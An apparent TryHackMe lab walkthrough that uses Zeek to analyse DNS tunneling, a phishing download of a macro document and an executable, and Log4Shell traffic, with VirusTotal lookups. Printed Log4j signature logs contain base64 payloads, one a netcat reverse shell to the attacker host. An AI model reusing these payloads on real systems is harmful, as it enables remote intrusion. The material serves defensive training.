ZEEK EXERCISES
ANOMALOUS DNS
Investigate the dns-tunneling.pcap file. Investigate the dns.log file. What is the number of DNS records linked to the IPv6 address?
root@thm:~$ cd Desktop/Exercise-Files/anomalous-dns
root@thm:~$ ls
clear-logs.sh dns-tunneling.pcap
root@thm:~$ zeek -C -r dns-tunneling.pcap
root@thm:~$ ls
clear-logs.sh dns-tunneling.pcap http.log packet_filter.log
conn.log dns.log ntp.log
root@thm:~$ head dns.log
#fields ts uid id.orig_h id.orig_p id.resp_h id.resp_p proto trans_idrtt query qclass qclass_name qtype qtype_name rcode rcode_name AA TC RD RA Z answers TTLs rejected
#types time string addr port addr port enum count interval string count string count string count string bool bool bool bool count vector[string] vector[interval] bool
1623212924.825154 CcJ7pk2dFfkLv8WXfe 10.20.57.3 59580 10.10.2.22 53 udp 5374 0.855652 e7f1018ea0310f25bba0610936fd1cc2af.cisco-update.com 1 C_INTERNET 15 MX 0 NOERROR F F T T 0 3591018ea0f08b48069ca0ffff640c1cfb.cisco-update.com 58.000000 F
root@thm:~$ cat dns.log | zeek-cut qtype_name
TXT
CNAME
MX
AAAA
...
root@thm:~$ cat dns.log | zeek-cut qtype_name | grep AAAA | wc -l
320Investigate the dns-tunneling.pcap file. Investigate the conn.log file. What is the longest connection duration?
root@thm:~$ cd Desktop/Exercise-Files/anomalous-dns
root@thm:~$ ls
clear-logs.sh dns-tunneling.pcap
root@thm:~$ zeek -C -r dns-tunneling.pcap
root@thm:~$ ls
clear-logs.sh dns-tunneling.pcap http.log packet_filter.log
conn.log dns.log ntp.log
root@thm:~$ head conn.log
#fields ts uid id.orig_h id.orig_p id.resp_h id.resp_p proto service duration orig_bytes resp_bytes conn_state local_orig local_resp missed_bytes history orig_pkts orig_ip_bytes resp_pkts resp_ip_bytes tunnel_parents
#types time string addr port addr port enum string interval count count string bool bool count string count count count count set[string]
1623212924.825154 CcJ7pk2dFfkLv8WXfe 10.20.57.3 59580 10.10.2.22 53 udp dns 0.855652 80 175 SF - - 0 Dd 1 108 1 203-
1623212925.678141 CglDT21NBa0XUHywyl 10.20.57.3 47888 10.10.2.22 53 udp dns 0.158643 80 175 SF - - 0 Dd 1 108 1 203-
root@thm:~$ cat conn.log | zeek-cut duration
0.658508
0.360476
0.039498
...
root@thm:~$ cat conn.log | zeek-cut duration | sort -n
3.445874
4.238265
7.835490
9.420791Investigate the dns-tunneling.pcap file. Investigate the dns.log file. Filter all unique DNS queries. What is the number of unique domain queries?
root@thm:~$ cd Desktop/Exercise-Files/anomalous-dns
root@thm:~$ ls
clear-logs.sh dns-tunneling.pcap
root@thm:~$ zeek -C -r dns-tunneling.pcap
root@thm:~$ ls
clear-logs.sh dns-tunneling.pcap http.log packet_filter.log
conn.log dns.log ntp.log
root@thm:~$ head dns.log
#fields ts uid id.orig_h id.orig_p id.resp_h id.resp_p proto trans_idrtt query qclass qclass_name qtype qtype_name rcode rcode_name AA TC RD RA Z answers TTLs rejected
#types time string addr port addr port enum count interval string count string count string count string bool bool bool bool count vector[string] vector[interval] bool
1623212924.825154 CcJ7pk2dFfkLv8WXfe 10.20.57.3 59580 10.10.2.22 53 udp 5374 0.855652 e7f1018ea0310f25bba0610936fd1cc2af.cisco-update.com 1 C_INTERNET 15 MX 0 NOERROR F F T T 0 3591018ea0f08b48069ca0ffff640c1cfb.cisco-update.com 58.000000 F
root@thm:~$ cat dns.log | zeek-cut query
db.rhodes.edu
4542016cb16eb15fd56e1b16c4545111d7.cisco-update.com
...
root@thm:~$ cat dns.log | zeek-cut query |rev | cut -d '.' -f 1-2 | rev | sort | uniq
_tcp.local
cisco-update.com
in-addr.arpa
ip6.arpa
rhodes.edu
ubuntu.com
root@thm:~$ cat dns.log | zeek-cut query |rev | cut -d '.' -f 1-2 | rev | sort | uniq | wc -l
6Investigate the dns-tunneling.pcap file. There are a massive amount of DNS queries sent to the same domain. This is abnormal. Let's find out which hosts are involved in this activity. Investigate the conn.log file. What is the IP address of the source host?
root@thm:~$ cd Desktop/Exercise-Files/anomalous-dns
root@thm:~$ ls
clear-logs.sh dns-tunneling.pcap
root@thm:~$ zeek -C -r dns-tunneling.pcap
root@thm:~$ ls
clear-logs.sh dns-tunneling.pcap http.log packet_filter.log
conn.log dns.log ntp.log
root@thm:~$ head conn.log
#fields ts uid id.orig_h id.orig_p id.resp_h id.resp_p proto service duration orig_bytes resp_bytes conn_state local_orig local_resp missed_bytes history orig_pkts orig_ip_bytes resp_pkts resp_ip_bytes tunnel_parents
#types time string addr port addr port enum string interval count count string bool bool count string count count count count set[string]
1623212924.825154 CcJ7pk2dFfkLv8WXfe 10.20.57.3 59580 10.10.2.22 53 udp dns 0.855652 80 175 SF - - 0 Dd 1 108 1 203-
1623212925.678141 CglDT21NBa0XUHywyl 10.20.57.3 47888 10.10.2.22 53 udp dns 0.158643 80 175 SF - - 0 Dd 1 108 1 203-
root@thm:~$ cat conn.log | zeek-cut id.orig_h
10.20.57.3
10.20.57.3
...
root@thm:~$ cat conn.log | zeek-cut id.orig_h | sort | uniq
10.20.57.3
fe80::202a:f0b1:7d9c:bd9ePHISHING
Investigate the logs. What is the suspicious source address? Enter your answer in defanged format.
root@thm:~$ cd Desktop/Exercise-Files/phishing
root@thm:~$ ls
clear-logs.sh file-extract-demo.zeek hash-demo.zeek phishing.pcap
root@thm:~$ cat file-extract-demo.zeek
# Load file extract framework!
@load /opt/zeek/share/zeek/policy/frameworks/files/extract-all-files.zeek
root@thm:~$ cat hash-demo.zeek
# Enable MD5, SHA1 and SHA256 hashing for all files.
@load /opt/zeek/share/zeek/policy/frameworks/files/hash-all-files.zeek
root@thm:~$ zeek -C -r phishing.pcap
root@thm:~$ ls
clear-logs.sh conn.log dhcp.log dns.log file-extract-demo.zeek files.log hash-demo.zeek http.log
root@thm:~$ cat files.log
#fields ts fuid tx_hosts rx_hosts conn_uids source depth analyzers mime_type filename duration local_orig is_orig seen_bytes total_bytes missing_bytes overflow_bytes timedout parent_fuid md5 sha1 sha256 extracted extracted_cutoff extracted_size
#types time string set[addr] set[addr] set[string] string count set[string] string string interval bool bool count count count count bool string string string string string bool count
1561667874.743959 Fpgan59p6uvNzLFja 23.63.254.163 10.6.27.102 CLYI4E3rTcU5VAMw51 HTTP 0 (empty) text/plain - 0.000000 - F 14 14 0 0F- - - - - - -
1561667889.703239 FB5o2Hcauv7vpQ8y3 107.180.50.162 10.6.27.102 C0Bg3l4Y4wO1g2JNbl HTTP 0 (empty) application/msword - 4.386569 - F 323072 - 00F - - - - - - -
1561667899.060086 FOghls3WpIjKpvXaEl 107.180.50.162 10.6.27.102 COY5YG1s9ZuflGNT48 HTTP 0 PE application/x-dosexec - 0.498764 - F 2437120 - 00F - - - - - - -
root@thm:~$ cat files.log | zeek-cut tx_hosts rx_hosts mime_type filename
23.63.254.163 10.6.27.102 text/plain -
107.180.50.162 10.6.27.102 application/msword -
107.180.50.162 10.6.27.102 application/x-dosexec -
* the online application that may look suspicious at first glance is the executable file
root@thm~:$ BROWSER > https://gchq.github.io/
input: 10.6.27.102
recipe: defang ip addresses
output: 10[.]6[.]27[.]102Investigate the http.log file. Which domain address were the malicious files downloaded from? Enter your answer in defanged format.
root@thm:~$ cd Desktop/Exercise-Files/phishing
root@thm:~$ ls
clear-logs.sh file-extract-demo.zeek hash-demo.zeek phishing.pcap
root@thm:~$ cat file-extract-demo.zeek
# Load file extract framework!
@load /opt/zeek/share/zeek/policy/frameworks/files/extract-all-files.zeek
root@thm:~$ cat hash-demo.zeek
# Enable MD5, SHA1 and SHA256 hashing for all files.
@load /opt/zeek/share/zeek/policy/frameworks/files/hash-all-files.zeek
root@thm:~$ zeek -C -r phishing.pcap
root@thm:~$ ls
clear-logs.sh conn.log dhcp.log dns.log file-extract-demo.zeek files.log hash-demo.zeek http.log
root@thm:~$ cat http.log
#fields ts uid id.orig_h id.orig_p id.resp_h id.resp_p trans_depth method host uri referrer version user_agent origin request_body_len response_body_len status_code status_msg info_code info_msg tags username password proxied orig_fuids orig_filenames orig_mime_types resp_fuids resp_filenames resp_mime_types
#types time string addr port addr port count string string string string string string string count count count string count string set[enum] string string set[string] vector[string] vector[string] vector[string] vector[string] vector[string] vector[string]
1561667874.713411 CLYI4E3rTcU5VAMw51 10.6.27.102 49157 23.63.254.163 80 1 GET www.msftncsi.com /ncsi.txt - 1.1 Microsoft NCSI - 0 14 200 OK - - (empty) - - - - - - Fpgan59p6uvNzLFja - text/plain
1561667889.643717 C0Bg3l4Y4wO1g2JNbl 10.6.27.102 49159 107.180.50.162 80 1 GET smart-fax.com /Documents/Invoice&MSO-Request.doc - 1.1 Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko - 0 323072 200 OK - - (empty) - - - - - - FB5o2Hcauv7vpQ8y3 - application/msword
1561667898.911759 COY5YG1s9ZuflGNT48 10.6.27.102 49162 107.180.50.162 80 1 GET smart-fax.com /knr.exe - 1.1 Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) - 0 2437120 200 OK - - (empty) - --- - - FOghls3WpIjKpvXaEl - application/x-dosexec
root@thm:~$ cat http.log | zeek-cut id.orig_h host uri
10.6.27.102 www.msftncsi.com /ncsi.txt
10.6.27.102 smart-fax.com /Documents/Invoice&MSO-Request.doc
10.6.27.102 smart-fax.com /knr.exe
root@thm~:$ BROWSER > https://gchq.github.io/
input: smart-fax.com
recipe: defang url
output: smart-fax[.]comInvestigate the malicious document in VirusTotal. What kind of file is associated with the malicious document?
root@thm:~$ cd Desktop/Exercise-Files/phishing
root@thm:~$ ls
clear-logs.sh file-extract-demo.zeek hash-demo.zeek phishing.pcap
root@thm:~$ cat file-extract-demo.zeek
# Load file extract framework!
@load /opt/zeek/share/zeek/policy/frameworks/files/extract-all-files.zeek
root@thm:~$ cat hash-demo.zeek
# Enable MD5, SHA1 and SHA256 hashing for all files.
@load /opt/zeek/share/zeek/policy/frameworks/files/hash-all-files.zeek
root@thm:~$ zeek -C -r phishing.pcap
root@thm:~$ ls
clear-logs.sh conn.log dhcp.log dns.log file-extract-demo.zeek files.log hash-demo.zeek http.log
root@thm:~$ cat http.log
#fields ts uid id.orig_h id.orig_p id.resp_h id.resp_p trans_depth method host uri referrer version user_agent origin request_body_len response_body_len status_code status_msg info_code info_msg tags username password proxied orig_fuids orig_filenames orig_mime_types resp_fuids resp_filenames resp_mime_types
#types time string addr port addr port count string string string string string string string count count count string count string set[enum] string string set[string] vector[string] vector[string] vector[string] vector[string] vector[string] vector[string]
1561667874.713411 CLYI4E3rTcU5VAMw51 10.6.27.102 49157 23.63.254.163 80 1 GET www.msftncsi.com /ncsi.txt - 1.1 Microsoft NCSI - 0 14 200 OK - - (empty) - - - - - - Fpgan59p6uvNzLFja - text/plain
1561667889.643717 C0Bg3l4Y4wO1g2JNbl 10.6.27.102 49159 107.180.50.162 80 1 GET smart-fax.com /Documents/Invoice&MSO-Request.doc - 1.1 Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko - 0 323072 200 OK - - (empty) - - - - - - FB5o2Hcauv7vpQ8y3 - application/msword
1561667898.911759 COY5YG1s9ZuflGNT48 10.6.27.102 49162 107.180.50.162 80 1 GET smart-fax.com /knr.exe - 1.1 Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) - 0 2437120 200 OK - - (empty) - --- - - FOghls3WpIjKpvXaEl - application/x-dosexec
* the malicious file could be the /knr.exe
root@thm:~$ cat http.log | zeek-cut id.orig_h host uri
10.6.27.102 www.msftncsi.com /ncsi.txt
10.6.27.102 smart-fax.com /Documents/Invoice&MSO-Request.doc
10.6.27.102 smart-fax.com /knr.exe
root@thm~:$ zeek -C -r phishing.pcap hash-demo.zeek
* there will be new hashed fields the files.log file
root@thm:~$ cat files.log
#fields ts fuid tx_hosts rx_hosts conn_uids source depth analyzers mime_type filename duration local_orig is_orig seen_bytes total_bytes missing_bytes overflow_bytes timedout parent_fuid md5 sha1 sha256 extracted extracted_cutoff extracted_size
#types time string set[addr] set[addr] set[string] string count set[string] string string interval bool bool count count count count bool string string string string string bool count
1561667874.743959 Fpgan59p6uvNzLFja 23.63.254.163 10.6.27.102 CI5U2K3Zk6D31MnLp8 HTTP 0 SHA1,MD5 text/plain - 0.000000 - F 14 14 00 F - cd5a4d3fdd5bffc16bf959ef75cf37bc 33bf88d5b82df3723d5863c7d23445e345828904- - - -
1561667889.703239 FB5o2Hcauv7vpQ8y3 107.180.50.162 10.6.27.102 Ch8wOn2b7M249xNQ12 HTTP 0 SHA1,MD5 application/msword - 4.386569 - F 323072 -0 0 F - b5243ec1df7d1d5304189e7db2744128 a66bd2557016377dfb95a87c21180e52b23d2e4e - - - -
1561667899.060086 FOghls3WpIjKpvXaEl 107.180.50.162 10.6.27.102 Ce5njOG0IJsxzOL08 HTTP 0 SHA1,MD5,PE application/x-dosexec - 0.498764 - F 2437120-0 0 F - cc28e40b46237ab6d5282199ef78c464 0d5c820002cf93384016bd4a2628dcc5101211f4 - - - -
#correlate the fuid w/ the uid of the file found in the http.log
#/knr.exe's uid is COY5YG1s9ZuflGNT48 in the http.log file
#/Documents/Invoice&MSO-Request.doc uid is C0Bg3l4Y4wO1g2JNbl in the http.log file
root@thm:~$ cat files.log | zeek-cut mime_type md5
text/plain cd5a4d3fdd5bffc16bf959ef75cf37bc
application/msword b5243ec1df7d1d5304189e7db2744128
application/x-dosexec cc28e40b46237ab6d5282199ef78c464
root@thm:~$ BROWSER > https://www.virustotal.com/
search: b5243ec1df7d1d5304189e7db2744128
relations > bundled files
Bundled Files (41)
Scanned Detections File type Name
2024-11-04 10/61 VBA ThisDocument.cls
2024-05-23 6/63 VBA
2024-12-23 0/61 Text PROJECTwm
2024-11-08 0/62 ? [1]CompObj
2024-12-06 0/62 Text VBA_P-code.txtInvestigate the extracted malicious .exe file. What is the given file name in Virustotal?
root@thm:~$ cd Desktop/Exercise-Files/phishing
root@thm:~$ ls
clear-logs.sh file-extract-demo.zeek hash-demo.zeek phishing.pcap
root@thm:~$ cat file-extract-demo.zeek
# Load file extract framework!
@load /opt/zeek/share/zeek/policy/frameworks/files/extract-all-files.zeek
root@thm:~$ cat hash-demo.zeek
# Enable MD5, SHA1 and SHA256 hashing for all files.
@load /opt/zeek/share/zeek/policy/frameworks/files/hash-all-files.zeek
root@thm:~$ zeek -C -r phishing.pcap
root@thm:~$ ls
clear-logs.sh conn.log dhcp.log dns.log file-extract-demo.zeek files.log hash-demo.zeek http.log
root@thm:~$ cat http.log
#fields ts uid id.orig_h id.orig_p id.resp_h id.resp_p trans_depth method host uri referrer version user_agent origin request_body_len response_body_len status_code status_msg info_code info_msg tags username password proxied orig_fuids orig_filenames orig_mime_types resp_fuids resp_filenames resp_mime_types
#types time string addr port addr port count string string string string string string string count count count string count string set[enum] string string set[string] vector[string] vector[string] vector[string] vector[string] vector[string] vector[string]
1561667874.713411 CLYI4E3rTcU5VAMw51 10.6.27.102 49157 23.63.254.163 80 1 GET www.msftncsi.com /ncsi.txt - 1.1 Microsoft NCSI - 0 14 200 OK - - (empty) - - - - - - Fpgan59p6uvNzLFja - text/plain
1561667889.643717 C0Bg3l4Y4wO1g2JNbl 10.6.27.102 49159 107.180.50.162 80 1 GET smart-fax.com /Documents/Invoice&MSO-Request.doc - 1.1 Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko - 0 323072 200 OK - - (empty) - - - - - - FB5o2Hcauv7vpQ8y3 - application/msword
1561667898.911759 COY5YG1s9ZuflGNT48 10.6.27.102 49162 107.180.50.162 80 1 GET smart-fax.com /knr.exe - 1.1 Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) - 0 2437120 200 OK - - (empty) - --- - - FOghls3WpIjKpvXaEl - application/x-dosexec
* the malicious file could be the /knr.exe
root@thm:~$ cat http.log | zeek-cut id.orig_h host uri
10.6.27.102 www.msftncsi.com /ncsi.txt
10.6.27.102 smart-fax.com /Documents/Invoice&MSO-Request.doc
10.6.27.102 smart-fax.com /knr.exe
root@thm~:$ zeek -C -r phishing.pcap hash-demo.zeek
* there will be new hashed fields the files.log file
root@thm:~$ cat files.log
#fields ts fuid tx_hosts rx_hosts conn_uids source depth analyzers mime_type filename duration local_orig is_orig seen_bytes total_bytes missing_bytes overflow_bytes timedout parent_fuid md5 sha1 sha256 extracted extracted_cutoff extracted_size
#types time string set[addr] set[addr] set[string] string count set[string] string string interval bool bool count count count count bool string string string string string bool count
1561667874.743959 Fpgan59p6uvNzLFja 23.63.254.163 10.6.27.102 CI5U2K3Zk6D31MnLp8 HTTP 0 SHA1,MD5 text/plain - 0.000000 - F 14 14 00 F - cd5a4d3fdd5bffc16bf959ef75cf37bc 33bf88d5b82df3723d5863c7d23445e345828904- - - -
1561667889.703239 FB5o2Hcauv7vpQ8y3 107.180.50.162 10.6.27.102 Ch8wOn2b7M249xNQ12 HTTP 0 SHA1,MD5 application/msword - 4.386569 - F 323072 -0 0 F - b5243ec1df7d1d5304189e7db2744128 a66bd2557016377dfb95a87c21180e52b23d2e4e - - - -
1561667899.060086 FOghls3WpIjKpvXaEl 107.180.50.162 10.6.27.102 Ce5njOG0IJsxzOL08 HTTP 0 SHA1,MD5,PE application/x-dosexec - 0.498764 - F 2437120-0 0 F - cc28e40b46237ab6d5282199ef78c464 0d5c820002cf93384016bd4a2628dcc5101211f4 - - - -
#correlate the fuid w/ the uid of the file found in the http.log
#/knr.exe's uid is COY5YG1s9ZuflGNT48 in the http.log file
#/Documents/Invoice&MSO-Request.doc uid is C0Bg3l4Y4wO1g2JNbl in the http.log file
root@thm:~$ cat files.log | zeek-cut mime_type md5
text/plain cd5a4d3fdd5bffc16bf959ef75cf37bc
application/msword b5243ec1df7d1d5304189e7db2744128
application/x-dosexec cc28e40b46237ab6d5282199ef78c464
root@thm:~$ BROWSER > https://www.virustotal.com/
search: cc28e40b46237ab6d5282199ef78c464
detection:
749e161661290e8a2d190b1a66469744127bc25bf46e5d0c6f2e835f4b92db18
PleaseWaitWindow.exeInvestigate the malicious .exe file in VirusTotal. What is the contacted domain name? Enter your answer in defanged format.
root@thm:~$ cd Desktop/Exercise-Files/phishing
root@thm:~$ ls
clear-logs.sh file-extract-demo.zeek hash-demo.zeek phishing.pcap
root@thm:~$ cat file-extract-demo.zeek
# Load file extract framework!
@load /opt/zeek/share/zeek/policy/frameworks/files/extract-all-files.zeek
root@thm:~$ cat hash-demo.zeek
# Enable MD5, SHA1 and SHA256 hashing for all files.
@load /opt/zeek/share/zeek/policy/frameworks/files/hash-all-files.zeek
root@thm:~$ zeek -C -r phishing.pcap
root@thm:~$ ls
clear-logs.sh conn.log dhcp.log dns.log file-extract-demo.zeek files.log hash-demo.zeek http.log
root@thm:~$ cat http.log
#fields ts uid id.orig_h id.orig_p id.resp_h id.resp_p trans_depth method host uri referrer version user_agent origin request_body_len response_body_len status_code status_msg info_code info_msg tags username password proxied orig_fuids orig_filenames orig_mime_types resp_fuids resp_filenames resp_mime_types
#types time string addr port addr port count string string string string string string string count count count string count string set[enum] string string set[string] vector[string] vector[string] vector[string] vector[string] vector[string] vector[string]
1561667874.713411 CLYI4E3rTcU5VAMw51 10.6.27.102 49157 23.63.254.163 80 1 GET www.msftncsi.com /ncsi.txt - 1.1 Microsoft NCSI - 0 14 200 OK - - (empty) - - - - - - Fpgan59p6uvNzLFja - text/plain
1561667889.643717 C0Bg3l4Y4wO1g2JNbl 10.6.27.102 49159 107.180.50.162 80 1 GET smart-fax.com /Documents/Invoice&MSO-Request.doc - 1.1 Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko - 0 323072 200 OK - - (empty) - - - - - - FB5o2Hcauv7vpQ8y3 - application/msword
1561667898.911759 COY5YG1s9ZuflGNT48 10.6.27.102 49162 107.180.50.162 80 1 GET smart-fax.com /knr.exe - 1.1 Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) - 0 2437120 200 OK - - (empty) - --- - - FOghls3WpIjKpvXaEl - application/x-dosexec
* the malicious file could be the /knr.exe
root@thm:~$ cat http.log | zeek-cut id.orig_h host uri
10.6.27.102 www.msftncsi.com /ncsi.txt
10.6.27.102 smart-fax.com /Documents/Invoice&MSO-Request.doc
10.6.27.102 smart-fax.com /knr.exe
root@thm~:$ zeek -C -r phishing.pcap hash-demo.zeek
* there will be new hashed fields the files.log file
root@thm:~$ cat files.log
#fields ts fuid tx_hosts rx_hosts conn_uids source depth analyzers mime_type filename duration local_orig is_orig seen_bytes total_bytes missing_bytes overflow_bytes timedout parent_fuid md5 sha1 sha256 extracted extracted_cutoff extracted_size
#types time string set[addr] set[addr] set[string] string count set[string] string string interval bool bool count count count count bool string string string string string bool count
1561667874.743959 Fpgan59p6uvNzLFja 23.63.254.163 10.6.27.102 CI5U2K3Zk6D31MnLp8 HTTP 0 SHA1,MD5 text/plain - 0.000000 - F 14 14 00 F - cd5a4d3fdd5bffc16bf959ef75cf37bc 33bf88d5b82df3723d5863c7d23445e345828904- - - -
1561667889.703239 FB5o2Hcauv7vpQ8y3 107.180.50.162 10.6.27.102 Ch8wOn2b7M249xNQ12 HTTP 0 SHA1,MD5 application/msword - 4.386569 - F 323072 -0 0 F - b5243ec1df7d1d5304189e7db2744128 a66bd2557016377dfb95a87c21180e52b23d2e4e - - - -
1561667899.060086 FOghls3WpIjKpvXaEl 107.180.50.162 10.6.27.102 Ce5njOG0IJsxzOL08 HTTP 0 SHA1,MD5,PE application/x-dosexec - 0.498764 - F 2437120-0 0 F - cc28e40b46237ab6d5282199ef78c464 0d5c820002cf93384016bd4a2628dcc5101211f4 - - - -
#correlate the fuid w/ the uid of the file found in the http.log
#/knr.exe's uid is COY5YG1s9ZuflGNT48 in the http.log file
#/Documents/Invoice&MSO-Request.doc uid is C0Bg3l4Y4wO1g2JNbl in the http.log file
root@thm:~$ cat files.log | zeek-cut mime_type md5
text/plain cd5a4d3fdd5bffc16bf959ef75cf37bc
application/msword b5243ec1df7d1d5304189e7db2744128
application/x-dosexec cc28e40b46237ab6d5282199ef78c464
root@thm:~$ BROWSER > https://www.virustotal.com/
search: cc28e40b46237ab6d5282199ef78c464
behavior > dns resolutiona
DNS Resolutions
dunlop.hopto.org
query.prod.cms.rt.microsoft.com
res.public.onecdn.static.microsoft
www.microsoft.com
125.21.88.13.in-addr.arpa
root@thm:~$ BROWSER > cyberchef.io
input: hopto.org
recipe: defang url
output: hopto[.]orgInvestigate the http.log file. What is the request name of the downloaded malicious .exe file?
root@thm:~$ cd Desktop/Exercise-Files/phishing
root@thm:~$ ls
clear-logs.sh file-extract-demo.zeek hash-demo.zeek phishing.pcap
root@thm:~$ cat file-extract-demo.zeek
# Load file extract framework!
@load /opt/zeek/share/zeek/policy/frameworks/files/extract-all-files.zeek
root@thm:~$ cat hash-demo.zeek
# Enable MD5, SHA1 and SHA256 hashing for all files.
@load /opt/zeek/share/zeek/policy/frameworks/files/hash-all-files.zeek
root@thm:~$ zeek -C -r phishing.pcap
root@thm:~$ ls
clear-logs.sh conn.log dhcp.log dns.log file-extract-demo.zeek files.log hash-demo.zeek http.log
root@thm:~$ cat http.log
#fields ts uid id.orig_h id.orig_p id.resp_h id.resp_p trans_depth method host uri referrer version user_agent origin request_body_len response_body_len status_code status_msg info_code info_msg tags username password proxied orig_fuids orig_filenames orig_mime_types resp_fuids resp_filenames resp_mime_types
#types time string addr port addr port count string string string string string string string count count count string count string set[enum] string string set[string] vector[string] vector[string] vector[string] vector[string] vector[string] vector[string]
1561667874.713411 CLYI4E3rTcU5VAMw51 10.6.27.102 49157 23.63.254.163 80 1 GET www.msftncsi.com /ncsi.txt - 1.1 Microsoft NCSI - 0 14 200 OK - - (empty) - - - - - - Fpgan59p6uvNzLFja - text/plain
1561667889.643717 C0Bg3l4Y4wO1g2JNbl 10.6.27.102 49159 107.180.50.162 80 1 GET smart-fax.com /Documents/Invoice&MSO-Request.doc - 1.1 Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko - 0 323072 200 OK - - (empty) - - - - - - FB5o2Hcauv7vpQ8y3 - application/msword
1561667898.911759 COY5YG1s9ZuflGNT48 10.6.27.102 49162 107.180.50.162 80 1 GET smart-fax.com /knr.exe - 1.1 Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) - 0 2437120 200 OK - - (empty) - --- - - FOghls3WpIjKpvXaEl - application/x-dosexec
* the malicious file could be the /knr.exe
root@thm:~$ cat http.log | zeek-cut id.orig_h host uri
10.6.27.102 www.msftncsi.com /ncsi.txt
10.6.27.102 smart-fax.com /Documents/Invoice&MSO-Request.doc
10.6.27.102 smart-fax.com /knr.exeLOG4J
Investigate the log4shell.pcapng file with detection-log4j.zeek script. Investigate the signature.log file. What is the number of signature hits?
root@thm:~$ cd Desktop/Exercise-Files/log4j
root@thm:~$ ls
clear-logs.sh detection-log4j.zeek log4shell.pcapng
root@thm:~$ cat detection-log4j.zeek
# Load scan-NG Package!
@load /opt/zeek/share/zeek/site/cve-2021-44228
root@thm:~$ zeek -C -r log4shell.pcapng detection-log4j.zeek
root@thm:~$ ls
clear-logs.sh detection-log4j.zeek http.log log4shell.pcapng packet_filter.log weird.log
conn.log files.log log4j.log notice.log signatures.log
root@thm:~$ cat signatures.log
#fields ts uid src_addr src_port dst_addr dst_port note sig_id event_msg sub_msg sig_count host_count
#types time string addr port addr port enum string string string count count
1640023652.109820 CMzs07mEkv4GvJc68 192.168.56.102 389 172.17.0.2 36820 Signatures::Sensitive_Signature log4j_javaclassname_tcp 192.168.56.102: log4j_javaclassname_tcp 0\x81\xc8\x02\x01\x02d\x81\xc2\x04-Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo=0\x81\x900\x16\x04\x0djavaClassName1\x05\x04\x03foo0,\x04\x0cjavaCodeBase1\x1c\x04\x1ahttp://192.168.56.102:443/0$\x04\x0bobjectC... - -
1640025554.665741 CO8DsW2tkhOb5990Vc 192.168.56.102 389 172.17.0.2 36822 Signatures::Sensitive_Signature log4j_javaclassname_tcp 192.168.56.102: log4j_javaclassname_tcp 0\x81\xd0\x02\x01\x02d\x81\xca\x045Basic/Command/Base64/d2hpY2ggbmMgPiAvdG1wL3B3bmVkCg==0\x81\x900\x16\x04\x0djavaClassName1\x05\x04\x03foo0,\x04\x0cjavaCodeBase1\x1c\x04\x1ahttp://192.168.56.102:443/0$\x04... - -
1640026858.967970 CbpVAq3ecDRo6YocGj 192.168.56.102 389 172.17.0.2 36824 Signatures::Sensitive_Signature log4j_javaclassname_tcp 192.168.56.102: log4j_javaclassname_tcp 0\x81\xe4\x02\x01\x02d\x81\xde\x04IBasic/Command/Base64/bmMgMTkyLjE2OC41Ni4xMDIgODAgLWUgL2Jpbi9zaCAtdnZ2Cg==0\x81\x900\x16\x04\x0djavaClassName1\x05\x04\x03foo0,\x04\x0cjavaCodeBase1\x1c\x04\x1ahttp://19... - -
root@thm:~$ cat signatures.log | zeek-cut event_msg
192.168.56.102: log4j_javaclassname_tcp
192.168.56.102: log4j_javaclassname_tcp
192.168.56.102: log4j_javaclassname_tcpInvestigate the log4shell.pcapng file with detection-log4j.zeek script. Investigate the http.log file. Which tool is used for scanning?
root@thm:~$ cd Desktop/Exercise-Files/log4j
root@thm:~$ ls
clear-logs.sh detection-log4j.zeek log4shell.pcapng
root@thm:~$ cat detection-log4j.zeek
# Load scan-NG Package!
@load /opt/zeek/share/zeek/site/cve-2021-44228
root@thm:~$ zeek -C -r log4shell.pcapng detection-log4j.zeek
root@thm:~$ ls
clear-logs.sh detection-log4j.zeek http.log log4shell.pcapng packet_filter.log weird.log
conn.log files.log log4j.log notice.log signatures.log
root@thm:~$ head -n 20 http.log
#fields ts uid id.orig_h id.orig_p id.resp_h id.resp_p trans_depth method host uri referrer version user_agent origin request_body_len response_body_len status_code status_msg info_code info_msg tags username password proxied orig_fuids orig_filenames orig_mime_types resp_fuids resp_filenames resp_mime_types
#types time string addr port addr port count string string string string string string string count count count string count string set[enum] string string set[string]vector[string] vector[string] vector[string] vector[string] vector[string] vector[string]
1640023505.960608 C46qhk4zZ9Oa6yAoY4 172.17.0.1 60314 172.17.0.2 8080 1 GET 127.0.0.1:8080 / - 1.1 SecurityNik Testing - 0 91 400 (empty) - - (empty) - - - - - - Fq5jbu3EpCk5tV3f18 - text/json
1640023652.119439 CFZWci2SfK49pWcMq4 172.17.0.2 51832 192.168.56.102 443 1 GET 192.168.56.102:443 /ExploitQ8v7ygBW4i.class - 1.1 Java/1.8.0_181 - 0 1216 200 OK - - CVE_2021_44228::LOG4J_RCE - - - - - - Fm2Pk636DiMArmDn03 - application/x-java-applet
